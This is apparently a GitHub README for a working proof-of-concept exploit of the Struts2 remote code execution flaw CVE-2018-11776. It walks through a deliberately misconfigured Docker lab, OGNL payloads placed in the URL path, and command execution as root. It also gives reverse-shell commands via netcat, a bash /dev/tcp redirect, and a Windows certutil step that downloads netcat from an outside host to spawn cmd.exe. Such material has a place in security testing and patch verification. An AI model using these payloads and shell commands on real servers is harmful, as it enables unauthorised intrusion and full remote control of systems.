Skip to content
Switch branches/tags


Failed to load latest commit information.
Latest commit message
Commit time


hook-s3c (, @hook_s3c on twitter

Working Python test and PoC for CVE-2018-11776, originally appearing on;

What's going on?

Man Yue Mo from Semmle has disclosed an Struts2 RCE vulnerability, delivered in a payload encoded in the URL path of a request.

Versions affected are 2.3 to 2.3.34, and 2.5 to 2.5.16.

Default configuration is not vulnerable, but if misconfigured... F.

Set up your docker instance

exploit will work fine with the docker container build for cve-2017-5638 (struts2-showcase-2.3.12)

$ docker pull piesecurity/apache-struts2-cve-2017-5638
$ docker run -d --name struts2 -p 32771:8080 piesecurity/apache-struts2-cve-2017-5638

Set up your weakened configuration

$ apt-get install vim
$ vim /usr/local/tomcat/webapps/ROOT/WEB-INF/classes/struts.xml 

add the configuration below;

<action name="help">
            <result type="redirectAction">
                    <param name="actionName">date.action</param>

and also;

  <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" />

restart your tomcat and/or container

$ /usr/local/tomcat/bin/

Verify that target is vulnerable

test the url to see if a redirect and evaluation occurs;${2+2}/help.action >

with the test script;

$ ./
testing the url for exploit;${12612+24867}/help.action
URL s2-057 CVE-2018-11776 is vulnerable!

Execute commands PoC

$ ./ 'id'
[Execute]: id

uid=0(root) gid=0(root) groups=0(root)

Reverse shell

get your box ready to accept the reverse shell;

$ netcat -lvp 31337

run the script;

# you'll want to install netcat
$ ./ 'apt-get install netcat -y'

# now pop that shell 
$ ./ 'netcat -e "$SHELL" 31337'

replace 32771 with your exposed container port

Updated method via Bash, forward-slashes now supported.

$ netcat -lvp 31337
$ ./ "/bin/bash -i >& /dev/tcp/ 0>&1"

Windows reverse shell (untested)

# grab netcat binary

$ ./ 'certutil.exe -urlcache -split -f "https://yourhostingservice.1337/files/netcat.exe" nc.exe'

# execute
$ ./ 'nc.exe 31337 –e cmd.exe'

Debug hell (notes)

All requests with a forward-slash (/) will fail because Tomcat actively blocks these, you may need to work around this, for example using environment variables for /bin/bash as $SHELL in the example above.

With this in mind, the windows /c flag will not work as expected. I've only tested this on the docker container.


Thanks to @Menin_TheMiddle for showing that the forward-slash issue can be resolved, the code now supports forward-slashes and so a reverse shell without netcat via bash is now also possible, also now supports Windows instances (untested).


Patch your Struts, or simply don't use it.

I guess you can always sell identify fraud products if you happen to have a breach and all your customer details are leaked! (you know who you are, absolute scum)


Thanks to ;


shout out to vap0rsquad!!! sH3llG0d - Willow - D@3M0¢π1 - n4t4s - 23pieces


Working Python test and PoC for CVE-2018-11776, includes Docker lab




No releases published


No packages published